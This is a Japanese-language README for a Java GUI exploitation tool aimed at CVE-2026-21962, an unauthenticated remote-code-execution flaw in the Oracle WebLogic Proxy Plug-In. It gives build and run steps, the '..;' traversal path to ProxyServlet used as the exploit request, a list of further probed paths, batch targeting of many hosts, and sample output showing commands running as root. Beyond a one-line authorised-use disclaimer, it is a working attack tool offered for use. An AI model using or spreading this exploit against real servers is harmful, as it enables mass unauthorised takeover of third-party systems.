
Java GUIツールで、CVE-2026-21962を悪用するためのものです。これはOracle WebLogic Proxy Plug-Inにおける未認証のRCEであり、HTTP経由での複数ターゲットへのコマンド実行を可能にします。
Oracle WebLogic Server Proxy Plug-In RCE(リモートコード実行)脆弱性悪用ツールの Java GUI バージョン。
java-version/
├── pom.xml # Maven プロジェクト設定ファイル
├── README.md # プロジェクト説明ドキュメント
├── run.bat # Windows 起動スクリプト
└── src/
└── main/
└── java/
└── com/
└── ashwesker/
└── cve202621962/
├── Main.java # プログラムエントリポイント
├── core/
│ └── Exploit.java # 脆弱性悪用のコアロジック
├── gui/
│ └── MainWindow.java # GUI メインウィンドウ
└── util/
└── HttpClient.java # HTTP リクエストユーティリティ
プログラムウィンドウには以下の領域が含まれます:
入力パラメータ領域(上部)
ボタン領域(中央)
実行ログ領域(下部左側)
コマンド出力領域(下部右側)
cd java-version
mvn clean compile
mvn clean package
パッケージ化された JAR ファイルは target/cve-2026-21962-1.0.0.jar にあります。
run.bat ファイルをダブルクリックしてプログラムを起動
cd java-version
mvn exec:java -Dexec.mainClass="com.ashwesker.cve202621962.Main"
java -jar target/cve-2026-21962-1.0.0.jar
cd java-version
mvn clean compile
java -cp "target/classes;[依存jarパス]" com.ashwesker.cve202621962.Main
ターゲットURL:
http://192.168.1.100:7001
実行コマンド:
whoami
ターゲットURL:
http://192.168.1.100:7001
http://192.168.1.101:7001
http://192.168.1.102:7001
https://weblogic.example.com:4443
実行コマンド:
id
出力結果の例:
[*] 脆弱性テストを開始...
[*] ターゲットURL: http://192.168.1.100:7001
[*] 実行コマンド: id
[*] テストパス: http://192.168.1.100:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] 成功! ステータスコード: 200
[+] コマンド実行成功!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
================================================================================
[*] 脆弱性テストを開始...
[*] ターゲットURL: http://192.168.1.101:7001
[*] 実行コマンド: id
[*] テストパス: http://192.168.1.101:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] 成功! ステータスコード: 200
[+] コマンド実行成功!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
プログラム起動後、「ターゲットURL」テキスト領域にターゲットサーバーアドレスを入力
http://target:7001 または https://oracle-server:4443「実行コマンド」フィールドに実行するコマンドを入力
whoami, id, powershell -c ... など「脆弱性悪用実行」ボタンをクリックしてテストを開始
下部の「実行ログ」でテストプロセスを確認
下部の「コマンド出力」でコマンド実行結果を取得
「ターゲットURL」テキスト領域に複数のターゲットアドレスを入力、各行に1つ
http://target1:7001
http://target2:7001
https://target3:4443
「実行コマンド」フィールドに実行するコマンドを入力
「脆弱性悪用実行」ボタンをクリックして一括テストを開始
プログラムは各ターゲットを順番にテストし、異なるターゲットの出力結果は ================ (80個の等号) で区切られます
下部の「実行ログ」で各ターゲットのテストプロセスを確認
下部の「コマンド出力」で全ターゲットのコマンド実行結果を取得
プログラムは以下のパスを自動テストします:
/weblogic//wl_proxy//bea_wls_internal//_proxy//proxy/⚠️ 警告: このツールは認可されたセキュリティテスト専用です。許可なくこのツールを使用してシステムを攻撃することは違法です。
Main.java
Exploit.java
MainWindow.java
HttpClient.java
このプロジェクトは教育およびセキュリティ研究目的のみに使用されます。